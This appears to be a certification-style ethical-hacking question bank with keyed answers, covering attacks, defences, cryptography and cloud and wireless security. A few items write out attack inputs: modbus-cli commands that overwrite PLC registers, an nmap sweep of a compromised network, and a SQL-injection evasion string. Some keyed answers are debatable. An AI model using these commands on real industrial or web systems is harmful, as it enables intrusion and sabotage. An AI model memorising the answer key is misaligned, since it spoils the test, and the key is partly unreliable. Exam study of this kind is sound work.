The ________ is a penetration-testing toolkit, exploit development platform, and research tool that includes hundreds of working remote exploits for a variety of platforms. A Phishing Framework B Metasploit Framework C Megasploit Framework D Exploit Framework

B

The ________ to the target system essentially forces it to shut down, thereby denying service to the legitimate users. A approval B flood of incoming messages C lack of incoming messages D access

B

The compromise of cookies and sessions can provide an attacker with user credentials, allowing the attacker to access the account in order to assume the identity of other users of an application. A False B True

B

The configuration allows a wired or wireless network interface controller to pass all traffic it receives to the Central Processing Unit (CPU), rather than passing only the frames that the controller is intended to receive. Which of the following is being described? A. Multi-cast mode B. Promiscuous mode C. WEM D. Port forwarding

B

The establishment of a TCP connection involves a negotiation called three-way handshake. What type of message does the client send to the server in order to begin this negotiation? A. ACK B. SYN C. RST D. SYN-ACK

B

The first step in enumerating a Windows system is to take advantage of the ________ API. A enumeration B NetBIOS C system and network attacks D footprinting

B

The first step in scanning networks is to check for live systems. A False B True

B

The first step in securing web servers is to place them in a separate segment in the web-hosting network called the: A WLAN B DMZ C DBS D SMTP

B

The more information there is at hand about a target organization, the greater the chances are of knowing a network's security loopholes and, consequently, for gaining unauthorized access to it. A False B True

B

The only way to crack WPA is to sniff the password PMK associated with the "handshake" authentication process; and if this password is extremely complicated, it will be almost impossible to crack. A False B True

B

The study of ciphers, cipher text, or cryptosystems with the ability to identify vulnerabilities in them is called ________. A Secure Sockets Layer (SSL) B cryptanalysis C Data Encryption Standard (DES) D Public Key Infrastructure (PKI)

B

The unintentional downloading of software via the internet is called: A Black Hat Search Engine Optimization (SEO) B Drive-by Downloads C Spear-Phishing D Social Engineered Click-Jacking

B

There are multiple cloud deployment options depending on how isolated a customer's resources are from those of other customers. Shared environments share the costs and allow each customer to enjoy lower operations expenses. One solution is for a customer to join with a group of users or organizations to share a cloud environment. What is this cloud deployment option called? A. Private B. Community C. Public D. Hybrid

B

There are several defenses against social engineering. A True B False

B

There are six types of vulnerability assessment tools: host-based vulnerability assessment, application-layer vulnerability assessment, depth assessment, scope assessment, active/passive, and location/data-examined tools. A False B True

B

There is only one proven technique through which an attacker can hijack or steal valid session content. A True B False

B

This form of SQL testing falls within the scope of black-box testing. A Vulnerability testing B Function testing C Fuzzing testing D Static/dynamic testing

B

This form of encryption algorithm is a symmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm? A. HMAC encryption algorithm B. Twofish encryption algorithm C. IDEA D. Blowfish encryption algorithm

B

This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive data, such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve. Which is this wireless security protocol? A. WPA3-Personal B. WPA3-Enterprise C. WPA2-Enterprise D. WPA2-Personal

B

To invisibly maintain access to a machine, an attacker utilizes a rootkit that sits undetected in the core components of the operating system. What is this type of rootkit an example of? A. Hypervisor rootkit B. Kernel rootkit C. Hardware rootkit D. Firmware rootkit

B

To secure a network, an administrator needs to perform patch management, install proper antivirus software, check configurations, solve known issues in third-party applications, and troubleshoot hardware with default configurations. A False B True

B

To secure mobile devices, organizations should adopt strict measures and use security tools. A False B True

B

Unicode is a character-coding system that supports encoding, processing, and displaying written texts for worldwide languages to maintain consistency in computer representation. A False B True

B

Unpatched patches do not create a security hole in the webserver. A True B False

B

Using ________, the sender of the packet designates the path that a packet should take through the network in such a way that the designated path should bypass the firewall node. A AP addressing B source routing C Wi-Fi networking D application devices

B

Using social networking sites, it is hard for an attacker to impersonate someone the victim is likely to trust and fool the victim into revealing information that would help the attacker gain access to a system. A True B False

B

Virus hoaxes are a kind of bluff that can be almost as damaging as real viruses. A False B True

B

WPA2 makes wireless networks almost as secure as wired networks. A False B True

B

Web servers are NOT a significant component of a web infrastructure. A True B False

B

What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne? A. White-hat hacking program B. Bug bounty program C. Ethical hacking program D. Vulnerability hunting program

B

What is the known plaintext attack used against DES which gives the result that encrypting plaintext with one DES key followed by encrypting it with a second DES key is no more secure than using a single key? A. Man-in-the-middle attack B. Meet-in-the-middle attack C. Replay attack D. Traffic analysis attack

B

What is the port to block first in case you are suspicious that an IoT device has been compromised? A. 22 B. 48101 C. 80 D. 443

B

What is the purpose of a Demilitarized Zone (DMZ) on a network? A. To scan all traffic coming through the DMZ to the internal network B. To only provide direct access to the nodes within the DMZ and protect the network behind it C. To provide a place to put the honeypot D. To contain the network devices you wish to protect

B

What is the way to decide how a packet will move from an untrusted outside host to a protected inside that is behind a firewall, which permits the hacker to determine which ports are open and if the packets can pass through the packet-filtering of the firewall? A. Session hijacking B. Firewalking C. Man-in-the middle attack D. Network sniffing

B

What two conditions must a digital signature meet? A. Has to be the same number of characters as a physical signature and must be unique. B. Has to be unforgeable, and has to be authentic. C. Must be unique and have special characters. D. Has to be legible and neat.

B

What type of DoS attacks overflow the network with a high volume of traffic using existing network resources, thus depriving legitimate users of these resources? A Search engine B Bandwidth C Network D Social engineered

B

Whenever a port is open, it means a service/banner is running on it. A False B True

B

Which attack involves an attacker spoofing the root bridge in the topology? A Double Tagging B STP Attack C MAC Spoofing D VLAN Hopping

B

Which attack type typically involves the monitoring of data flow between systems without modifying the data? A Close-in B Passive C Insider D Distribution

B

Which injection vulnerability attack inserts carriage return characters into user input to trick the server? A Template B CRLF C SQL D Command

B

Which list is comprised of weakness types to serve as a baseline? A Common Vulnerabilities and Exposures (CVE) B Common Weakness Enumeration (CWE) C National Vulnerability Database (NVD) D Common Vulnerability Scoring System (CVSS)

B

Which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device through Bluetooth? A. Bluesmacking B. Bluesnarfing C. Bluejacking D. Bluebugging

B

Which of the following allows attackers to take over an active session by bypassing the authentication process? Thereafter, they can perform any action on that system. A Malicious software B Session hijacking C Packet sniffing D System hacking

B

Which of the following are an integral component of online business? Everyone connected via the internet is using an endless variety of them for different purposes, including online shopping, email, chats, and social networking. A Online applications B Web applications C Web services D Malicious software

B

Which of the following are the most basic type of ciphers, which operate on alphabets (A-Z)? A System integrity verifier B Classical ciphers C Modern ciphers D Government Access to Keys (GAK)

B

Which of the following are the preferred targets of hackers for compromising an organization's security? A Bluetooth devices B Networks C Banking sites D Internet users

B

Which of the following attacks are high-level attack vectors that affect many systems? A Fragmentation B Session-hijacking C Application layer D Volumetric

B

Which of the following components of public key infrastructure acts as a verifier for the certificate authority? A Authentication authority B Registration authority C Certificate management system D Validation authority

B

Which of the following is NOT a type of cloud service? A PaaS B EaaS C SaaS D IaaS

B

Which of the following is NOT an advantage of a private cloud? A Easier compliance B Locked-in hardware C More control D Enhanced security (services dedicated to a single organization)

B

Which of the following is a command line packet analyzer similar to GUI-based Wireshark? A. nessus B. tcpdump C. ethereal D. jack the ripper

B

Which of the following is a disadvantage of a community cloud? A SLAs B Liability C Speed D Control

B

Which of the following is a method used to collect information about remote networks behind firewalls? A AP misconfiguration B Firewalking C War driving D MAC spoofing

B

Which of the following is a process of protecting the wireless network from attackers who try to collect sensitive information by breaching the RF (Radio Frequency) traffic? A Security encryption B Wireless encryption C Internet surfing D Wi-Fi chalking

B

Which of the following is a purpose for scanning? A to use open ports B to discover exploitable communications channels C to list IP addresses D to transfer the request to the Web server

B

Which of the following is a serverless security risk due to the poor design of identity and access controls, paving the way for attackers to identify missing resources, such as open APIs and public cloud storage, and leading to system business logic breakage and execution flow disruption? A Injection B Broken authentication C Sensitive data exposure D XML external entities (XXE)

B

Which of the following is an attack where an attacker intercepts the communication between a client and server, negotiates cryptographic parameters to decrypt the encrypted content, and obtains confidential information such as system passwords? A Chosen-key attack B Man-in-the-middle attack C Rubber hose attack D Chosen-ciphertext attack

B

Which of the following is performed to detect the possible vulnerabilities in source code when the code is NOT executing? A Fuzzing code analysis B Static code analysis C Vulnerability code analysis D Dynamic code analysis

B

Which of the following is/are a kind of security break that does not generally result in the theft of information; however, these attacks can harm the target in terms of time and resources? A Connectivity attacks B DoS attacks C Active sniffing D Spear-Phishing

B

Which of the following modbus-cli commands is used by attackers to manipulate the register values in a target PLC device? A modbus write <Target IP> 101 1 1 1 1 1 1 1 1 1 1 modbus write <Target IP> %M100 1 1 1 1 1 1 1 1 1 1 B modbus write <Target IP> %MW100 2 2 2 2 2 2 2 2 modbus write <Target IP> 400101 2 2 2 2 2 2 2 2 C modbus read <Target IP> 101 10 modbus read <Target IP> %M100 10 D modbus read <Target IP> %MW100 10 modbus read <Target IP> 400101 10

B

Which of the following previously worked independently and are increasingly associated with organized crime syndicates? A Trojan horses B Cyber criminals C Interceptions D Cover interceptions

B

Which of the following protocols is often used for data compression, digital signing, encryption and decryption of messages, emails, files, and directories as well as to enhance the privacy of email communications? A EAP B PGP C CHAP D HMAC

B

Which of the following tools can be used for passive OS fingerprinting? A. nmap B. tcpdump C. tracert D. ping

B

Which of the following types of IDS alerts is an alarm raised when no actual attack is in progress? A True positive B False positive C True negative D False negative

B

Which of the following viruses tries to hide from anti-virus programs by actively altering and corrupting the chosen service call interruptions when they are being run? A. Macro virus B. Stealth/Tunneling virus C. Cavity virus D. Polymorphic virus

B

Which of the following wireless attack uses nonce reuse technique to exploit the four-way handshake of the WPA2 protocol? A Domain Login Cracking B Key Reinstallation Attack C Power Saving Attack D Bit-Flipping Attack

B

Which technique is used to determine a hostname from an IP address? A Reverse ARP request B Reverse DNS lookup C DHCP request D ICMP echo request

B

Which tool is used to exploit a target as well as perform information gathering? A Robtex B Metasploit C Th3Inspector D theHarvester

B

Which type of antenna radiates electromagnetic energy in all directions? A Directional B Omnidirectional C Dipole D Yagi

B

Which type of attack is a large-scale, coordinated attack on the availability of services on a victim's system or network resources, launched indirectly through many compromised computers on the internet? A DoS attacks B Distributed Denial-of-Service attacks C Connectivity attacks D Active sniffing attacks

B

Which type of attack uses sniffers on the network, allowing attackers to obtain information such as user IDs and passwords? A Active B Passive C Fragmentation D Application layer

B

Which type of attacks destroy a victim's ability to reassemble the fragmented packets, resulting in reduced performance? A Application layer attacks B Fragmentation attacks C TCP state-exhaustion attacks D Volumetric attacks

B

Which type of hijacking is about gaining control over the HTTP user session by obtaining the session IDs? A Peer-to-peer B Application-level C TCP Stat-level D Network-level

B

Which type of hijacking is the interception of packets during the transmission between client and server in a TCP/UDP session? A Application-level B Network-level C Peer-to-peer D TCP Stat-level

B

Why is a penetration test considered to be more thorough than vulnerability scan? A. Vulnerability scans only do host discovery and port scanning by default. B. A penetration test actively exploits vulnerabilities in the targeted infrastructure, while a vulnerability scan does not typically involve active exploitation. C. It is not - a penetration test is often performed by an automated tool, while a vulnerability scan requires active engagement. D. The tools used by penetration testers tend to have much more comprehensive vulnerability databases.

B

Why should the security analyst disable/remove unnecessary ISAPI filters? A. To defend against social engineering attacks B. To defend against webserver attacks C. To defend against jailbreaking D. To defend against wireless attacks

B

Wireless network assessments try to attack wireless authentication mechanisms and get unauthorized access through vulnerabilities that may exist within an organization's perimeter. A False B True

B

Xmas Scan is a port-scan technique with FIN, URG, and PUSH flags set to send a TCP frame to a remote device. A False B True

B

You have successfully comprised a server having an IP address of 10.10.0.5. You would like to enumerate all machines in the same network quickly. What is the best Nmap command you will use? A. nmap -T4 -q 10.10.0.0/24 B. nmap -T4 -F 10.10.0.0/24 C. nmap -T4 -r 10.10.1.0/24 D. nmap -T4 -O 10.10.0.0/24

B

You need to deploy a new web-based software package for your organization. The package requires three separate servers and needs to be available on theInternet. What is the recommended architecture in terms of server placement? A. All three servers need to be placed internally B. A web server facing the Internet, an application server on the internal network, a database server on the internal network C. A web server and the database server facing the Internet, an application server on the internal network D. All three servers need to face the Internet so that they can communicate between themselves

B

Your company was hired by a small healthcare provider to perform a technical assessment on the network. What is the best approach for discovering vulnerabilities on a Windows-based computer? A. Use the built-in Windows Update tool B. Use a scan tool like Nessus C. Check MITRE.org for the latest list of CVE findings D. Create a disk image of a clean Windows installation

B

________ are programmed in such a way that they rewrite themselves completely each time they infect a new executable file. A Cache viruses B Metamorphic viruses C Ransomware D Trojans

B

________ are the individuals who work both offensively and defensively at various times. A Hacktivists B Gray Hats C White Hats D Script Kiddies

B

________ checks the system for known exploitable attack vectors typically found on unpatched systems. A Port scanning B Vulnerability scanning C Network scanning D Workstation scanning

B

________ involves sending no packets. It just captures and monitors the packets flowing in the network. A Spear-Phishing B Passive sniffing C Active sniffing D Social engineering

B

________ is a process that gathers, analyzes, and distributes information about products, customers, competitors, and technologies using the internet. A Social networking B Competitive intelligence C Email tracking D Information tracking

B

________ is a technique in which an attacker sends an email or provides a link falsely claiming to be from a legitimate site in an attempt to acquire a user's personal or account information. A Spam B Phishing C Spear-Phishing D Pop-up

B

________ is a way of making passwords more secure by adding random strings of characters to them before their hash is calculated. A Spiking B Salting C Guessing D Spyware

B

________ is one of the major threats to organizations, as competitors can spy and attempt to steal sensitive data through footprinting. A System and network attacks B Corporate espionage C Information leakage D Privacy loss

B

________ is the assurance that the information is accessible only to those authorized to have access. A Availability B Confidentiality C Authenticity D Integrity

B

________ is the process of retrieving sensitive personal or organizational information by searching through trash bins. A Reverse engineering B Dumpster diving C Shoulder surfing D Eavesdropping

B

________ monitors and tracks the emails of a particular user. This kind of tracking is possible through digitally time-stamped records that reveal the time and date when the target receives and opens a specific ________. A Information tracking / data B Email tracking / email C System tracking / data D Social networking tracking / cache files

B

________ or telephone tapping is a method of monitoring telephone or internet conversations by a third party with covert intentions. A Spiking B Wiretapping C Programming D Trojan horses

B

________ refers to an unauthorized person listening in on a conversation or reading others' messages. A Reverse engineering B Eavesdropping C Dumpster diving D Shoulder surfing

B

________ refers to statutory obligation of individuals and organizations to disclose their cryptographic keys to government agencies. A System integrity verifier B Government Access to Keys (GAK) C Symmetric encryption D Asymmetric encryption

B

________ refers to the computing devices that are web-enabled and have the capability of sensing, collecting, and sending data using sensors, and the communication hardware and processors that are embedded within the device. A Wi-Fi B IoT C BYOD D AT-AT

B

________ searches for traffic on a switched LAN by actively injecting traffic into the LAN. A Social engineering B Active sniffing C Passive sniffing D Spear-Phishing

B

________ social engineering involves human interaction in one manner or another. A Social-based B Human-based C Mobile-based D Computer-based

B

________ techniques include creating viruses and worms, performing denial-of-service (DoS) attacks as well as establishing unauthorized remote access connections to a device using Trojans/backdoors, creating botnets, packet sniffing, phishing, and password cracking. A Personal-hacking B Network-hacking C Server-hacking D Intelligence-hacking

B

A ________ attack involves sniffing a network for hardware addresses of legitimate clients connected to the network. A pen testing B eviscerating Trojans C MAC duplicating D defacement Trojans

C

A ________ is a type of malware that restricts access to the computer system that it infects, or critical files and documents stored on it. A Trojan B program file C Ransomware D virus

C

A ________ is an active sniffing technique used by the attackers to steal and manipulate sensitive data. A cache file attack B Trojan horse attack C DHCP attack D defensive file attack

C

A ________ performs a wide range of available and emerging attacks to find loopholes or vulnerabilities in the target organization's IT infrastructure and suggests countermeasures to enhance the security. A worm manager B system administrator C penetration tester D spyware specialist

C

A hacker can use compromised IoT devices in order to build up a ________, which in turn is used to launch a(n) ________ attack. A honeynet / DPS B rapport / social engineering C botnet / DDoS D password list / brute force

C

A hacker is an intelligent individual with excellent computer skills and the ability to explore a computer's software and hardware without the owner's permission. Their intention can either be to simply gain knowledge or to illegally make changes. Which of the following class of hacker refers to an individual who works both offensively and defensively at various times? A. White Hat B. Suicide Hacker C. Gray Hat D. Black Hat

C

A hybrid cloud environment is comprised of ________ clouds that remain unique entities but bound together for offering the benefits of multiple deployment models. A one or more B three or more C two or more D four or more

C

A penetration tester is performing the footprinting process and is reviewing publicly available information about an organization by using the Google search engine. Which of the following advanced operators would allow the pen tester to restrict the search to the organization's web domain? A. [allinurl:] B. [location:] C. [site:] D. [link:]

C

A private cloud is also known as a ________ or ________ cloud. A personal / external B personal / internal C corporate / internal D corporate / external

C

A security protocol that is NIST FIPS 140-2 compliant and is used to safeguard wireless networks is: A Wi-Fi chalking B Wi-Fi Protected Access (WPA) C Wi-Fi Protected Access 2 (WPA2) D Wireless encryption

C

A session-hijacking attack refers to the exploitation of ________ so that the attacker can establish an unauthorized connection with a target server. A MAC address codes B service controls C token-security controls D online controls

C

A symmetric-key encryption, used in WPA2 as a replacement of TKIP, is called: A Bandwidth B Radius C Advanced Encryption Standard D Hotspot

C

A(n) ________ is a case-sensitive, 32-alphanumeric-character-long unique name of a wireless local area network (WLAN). A cookie site B injection site C service set identifier D access control number

C

A/An ________ channel is an illegal, hidden path used to transfer data from a network. A overt B Trojan horse C covert D internet

C

A/An ________ eliminates all the identifying information (IP address) from your system while you are surfing the internet, thereby ensuring privacy. A web app B proxy C anonymizer D application server

C

Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the target's MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with herMSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the above scenario? A. Cloud cryptojacking B. Man-in-the-cloud (MITC) attack C. Cloud hopper attack D. Cloudborne attack

C

Among all smartphones, ________ devices are the most likely to be hacked, due to their prominent use. A Blackberry B Galaxy C Android D iPhone

C

An attacker can use which of the following to try multiple possibilities of patterns until finding one that works? This technique is most useful when the algorithm that produces session IDs is non-random. A DoS attacks B Stealing C Brute forcing D Guessing

C

An attacker is trying to redirect the traffic of a small office. That office is using their own mail server, DNS server and NTP server because of the importance of their job. The attacker gain access to the DNS server and redirect the direction www.google.com to his own IP address. Now when the employees of the office want to go to Google they are being redirected to the attacker machine. What is the name of this kind of attack? A. MAC Flooding B. Smurf Attack C. DNS spoofing D. ARP Poisoning

C

An ethical hacker is also known as a: A good guy B Black Hat hacker C pen tester D investigator

C

An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools must the organization employ to protect its critical infrastructure? A. Robotium B. BalenaCloud C. Flowmon D. IntentFuzzer

C

As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment through penetration testing. What document describes the specifics of the testing, the associated violations, and essentially protects both the organization's interest and your liabilities as a tester? A. Service Level Agreement B. Project Scope C. Rules of Engagement D. Non-Disclosure Agreement

C

Attackers especially focus on ________ session hijacking, as it does not require host access (like host-level session hijacking does) and they need not tailor their attacks on a per-application basis as they would at the application level. A peer-to-peer B application-level C network-level D TCP Stat-level

C

Attackers taking session keys by acquiring files containing session IDs or memory contents of user systems or servers is called: A DoS attacks B Brute forcing C Stealing D Guessing

C

Attackers use which methodology to gain knowledge of a particular web application in order to compromise it successfully? A Applications hacking B TCP Stat hacking C Web-application hacking D Network hacking

C

Bob, a network administrator at Big University, realized that some students are connecting their notebooks in the wired network to have Internet access. In the university campus, there are many Ethernet ports available for professors and authorized visitors but not for students. He identified this when the IDS alerted for malware activities in the network. What should Bob do to avoid this problem? A. Disable unused ports in the switches B. Separate students in a different VLAN C. Use the 802.1x protocol D. Ask students to use the wireless network

C

Bob, a system administrator at TPNQM SA, concluded one day that a DMZ is NOT needed if he properly configures the firewall to allow access just to servers/ports, which can have direct internet access, and block the access to workstations. Bob also concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of TPNQM SA. In this context, what can you say? A. Bob can be right since DMZ does not make sense when combined with stateless firewalls B. Bob is partially right. He does not need to separate networks if he can create rules by destination IPs, one by one C. Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations D. Bob is partially right. DMZ does not make sense when a stateless firewall is available

C

By using the ________ technique, an attacker can reconfigure a MAC address to appear as an authorized AP to a host on a trusted network. A ad-hoc associations B war driving C MAC spoofing D AP misconfiguration

C

Clark, a professional hacker, was hired by an organization to gather sensitive information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whois footprinting. Further, he entered the server IP address as an input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network. What is the online tool employed by Clark in the above scenario? A. DuckDuckGo B. AOL C. ARIN D. Baidu

C

DNS cache snooping is a process of determining if the specified resource address is present in the DNS cache records. It may be useful during the examination of the network to determine what software update resources are used, thus discovering what software is installed. What command is used to determine if the entry is present in DNS cache? A. nslookup -fullrecursive update.antivirus.com B. dnsnooping -rt update.antivirus.com C. nslookup -norecursive update.antivirus.com D. dns --snoop update.antivirus.com

C

Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website, www.moviescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on predefined signatures. To evade any comparison statement, he attempted placing characters such as '" or '1'='1″ in any basic injection statement such "or 1=1." Identify the evasion technique used by Daniel in the above scenario. A. Char encoding B. IP fragmentation C. Variation D. Null byte

C

Disadvantages of Platform-as-a-Service (PaaS) include all the following EXCEPT: A Application integration B Vendor lock-in C Lower risk D Data privacy

C

Dorian is sending a digitally signed email to Poly. With which key is Dorian signing this message and how is Poly validating it? A. Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian's private key. B. Dorian is signing the message with Poly's private key, and Poly will verify that the message came from Dorian by using Dorian's public key. C. Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian's public key. D. Dorian is signing the message with Poly's public key, and Poly will verify that the message came from Dorian by using Dorian's public key

C

Due to a slowdown of normal network operations, the IT department decided to monitor internet traffic for all of the employees. From a legal standpoint, what would be troublesome to take this kind of measure? A. All of the employees would stop normal work activities B. IT department would be telling employees who the boss is C. Not informing the employees that they are going to be monitored could be an invasion of privacy. D. The network could still experience traffic slow down.

C

During a black-box pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled host. The traffic gets blocked; however, outbound HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic? A. Circuit B. Stateful C. Application D. Packet Filtering

C

Each webserver has a ________ and ________ associated with a domain name. A client / server B vulnerability / web application C domain name / IP address D search engine / publisher

C

Hackers often raise the trust level of a phishing message by modeling the email to look similar to the internal email used by the target company. This includes using logos, formatting, and names of the target company. The phishing message will often use the name of the company CEO, President, or Managers. The time a hacker spends performing research to locate this information about a company is known as? A. Exploration B. Investigation C. Reconnaissance D. Enumeration

C

Identify the UDP port that Network Time Protocol (NTP) uses as its primary means of communication? A. 113 B. 69 C. 123 D. 161

C

Identify the attack in which an attacker uses multiple forged identities to create a strong illusion of traffic congestion, affecting communication between neighboring nodes and networks. A Rolling Code Attack B BlueBorne Attack C Sybil Attack D Jamming Attack

C

Identify the attack in which an authenticated user is made to perform certain tasks on the web application that an attacker chooses, e.g., a user clicking on a particular link sent through an email or chat. A Cookie Snooping B Cross-Site Scripting C Cross-Site Request Forgery D Cookie/Session Poisoning

C

Identify the attack that exploits the vulnerabilities present in the data compression feature of protocols, such as SSL/TLS, SPDY, and HTTPS. A Session fixation attack B Forbidden attack C Compression Ratio Info-Leak Made Easy (CRIME) attack D Cross-site script attack

C

Identify the command used to configure the Cisco port security that sets the maximum number of secure MAC addresses for the interface. A Switchport port-security aging type inactivity B Snmp-server enable traps port-security trap-rate 5 C Switchport port-security maximum 1 vlan access D Switchport port-security aging time 2

C

Identify the enumeration technique where attackers enumerate sensitive information such as encryption and hashing algorithm, authentication type, key distribution algorithm, and SA LifeDuration. A SMTP Enumeration B NFS Enumeration C IPsec Enumeration D NetBIOS Enumeration

C

Identify the operational level of the Purdue model in which the production management, individual plant monitoring, and control functions are defined. A Level 4 B Level 1 C Level 3 D Level 2

C

Identify the port number used by the Trojan WannaCry. A Port 8080 B Port 1177 C Port 445 D Port 65000

C

Identify the steganalysis method in which an attacker performs probability analysis to test whether the stego object and original data are the same or not. A Blind Classifier B Stego-only C Chi-square D Known-stego

C

Identify the type of IDS alert in which an IDS does not raise the alarm when a legitimate attack has taken place. A True Negative B False Positive C False Negative D True Positive

C

Identify the type of active online attack in which instead of taking input from two different dictionaries, attackers use a single input dictionary to build chains of combined words. A Toggle-Case Attack B Markov Chains Attack C PRINCE Attack D Fingerprint Attack

C

If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do you know about the firewall you are scanning? A. It is a non-stateful firewall. B. There is no firewall in place. C. It is a stateful firewall. D. This event does not tell you anything about the firewall.

C

In ________, a hacker can inject malicious data or commands into the intercepted communications in a TCP session, even if the victim disables source routing. A TCP state-level hijacking B UDP hijacking C blind hijacking D application-level hijacking

C

In a/an ________ SQL injection, the attacker simply sends a malicious SQL query to the database. A error-based B baseless C blind D DoS/DDoS

C

In an attempt to increase the security of your network, you implement a solution that will help keep your wireless network undiscoverable and accessible only to those that know it. How do you accomplish this? A. Delete the wireless network B. Lock all users C. Disable SSID broadcasting D. Remove all passwords

C

In the ________ phase, attackers try to find out the vulnerabilities present in the target device. A maintaining access B gaining access C vulnerability scanning D information gathering

C

In the field of cryptanalysis, what is meant by a "rubber-hose" attack? A. Forcing the targeted keystream through a hardware-accelerated device such as an ASIC. B. A backdoor placed into a cryptographic algorithm by its creator. C. Extraction of cryptographic secrets through coercion or torture. D. Attempting to decrypt ciphertext by making logical assumptions about the contents of the original plaintext.

C

In which of the following attacks does an attacker pretend to be a legitimate or authorized person and uses a phone or other communication medium to mislead targets and trick them into revealing information? A Dumpster Diving B Eavesdropping C Impersonation D Shoulder Surfing

C

In which type of attack does the attacker take over an existing session either by tearing down the connection on one side of the conversation or by actively participating? A Fragmentation B Application layer C Active D Passive

C

Internet Protocol Security IPsec is actually a suite pf protocols. Each protocol within the suite provides different functionality. Collective IPsec does everything except. A. Protect the payload and the headers B. Encrypt C. Work at the Data Link Layer D. Authenticate

C

It is a ________ to choose information-security controls and implement them in proportion to the risks—generally by assessing threats, vulnerabilities, and impacts. A guideline B rule C best practice D law

C

It is difficult to detect a(n) ________ because it is an authorized, legitimate device on the network. A application devices B Wi-Fi network C misconfigured AP D AP addressing

C

Jane invites her friends Alice and John over for a LAN party. Alice and John access Jane's wireless network without a password. However, Jane has a long, complex password on her router. What attack has likely occurred? A. Wardriving B. Wireless sniffing C. Evil twin D. Piggybacking

C

John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services. He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names to launch further attacks on the target organization. What is the tool employed by John to gather information from the LDAP service? A. ike-scan B. Zabasearch C. JXplorer D. EarthExplorer

C

Kevin, a professional hacker, wants to penetrate CyberTech Inc's network. He employed a technique, using which he encoded packets with Unicode characters.The company's IDS cannot recognize the packets, but the target web server can decode them. What is the technique used by Kevin to evade the IDS system? A. Session splicing B. Urgency flag C. Obfuscating D. Desynchronization

C

Limitations to cloud computing include all of the following EXCEPT: A Contracts and lock-ins B Limited control and flexibility C Distributed storage D Security, privacy, and compliance issues

C

Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the information, he successfully performed an attack on the target government organization without being traced. Which of the following techniques is described in the above scenario? A. Website footprinting B. Dark web footprinting C. VPN footprinting D. VoIP footprinting

C

Management Information Base (MIB) is a ________ containing a formal description of all the network objects that SNMP manages. A cache file B footprint C virtual database D SNMP enumeration

C

Once attackers have ________, they work to install malicious programs to grant themselves remote system access. A network diagrams B footprints C administrator privileges D access

C

Once the attackers detect live systems in the target network, they try to find ________ in the detected live systems. A closed ports B unused ports C open ports D unnecessary ports

C

PGP, SSL, and IKE are all examples of which type of cryptography? A. Digest B. Secret Key C. Public Key D. Hash Algorithm

C

Richard, an attacker, targets an MNC. In this process, he uses a footprinting technique to gather as much information as possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date. With this information, he creates a map of the organization's network and misleads domain owners with social engineering to obtain internal details of its network. What type of footprinting technique is employed by Richard? A. VoIP footprinting B. Email footprinting C. Whois footprinting D. VPN footprinting

C

Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS tunneling method in order to exfiltrate data. He is using the NSTX tool for bypassing the firewalls. On which of the following ports should Robin run the NSTX tool? A. Port 50 B. Port 23 C. Port 53 D. Port 80

C

SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access and/or modify data attached to a web application. Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker? A. In-band SQLi B. Union-based SQLi C. Out-of-band SQLi D. Time-based blind SQLi

C

SQL injection is a/an ________ attack used to either gain unauthorized access to a database or to retrieve information directly from the database. A complex B multi-phased C basic D advanced

C

Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed. What is the port scanning technique used by Sam to discover open ports? A. Xmas scan B. IDLE/IPID header scan C. TCP Maimon scan D. ACK flag probe scan

C

Sam, an ethical hacker, is launching an attack on a target company. He performed various enumeration activities to detect any existing vulnerabilities on the target network and systems. In this process, he performed NTP enumeration and executed some commands to acquire the list of hosts connected to the NTP server. Which of the following NTP enumeration commands helps Sam in collecting system information such as the number of time samples from several time sources? A ntptrace B ntpdc C ntpdate D ntpq

C

Session hijacking can be either ________ or ________, depending on the degree of involvement of the attacker. A application / layered B fragmented / exhaustive C active / passive D volumetric / fragmented

C

Social-engineering targets comply with information requests out of a sense of ________. A fear B goodwill C moral obligation D greed

C

Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After establishing the connection with the public computer, Steven enabled iTunes Wi-Fi sync on the computer so that the device could continue communication with that computer even after being physically disconnected. Now, Clark gains access to Steven's iPhone through the infected computer and is able to monitor and read all of Steven's activity on the iPhone, even after the device is out of the communication zone. Which of the following attacks is performed by Clark in the above scenario? A. Man-in-the-disk attack B. iOS jailbreaking C. iOS trustjacking D. Exploiting SS7 vulnerability

C

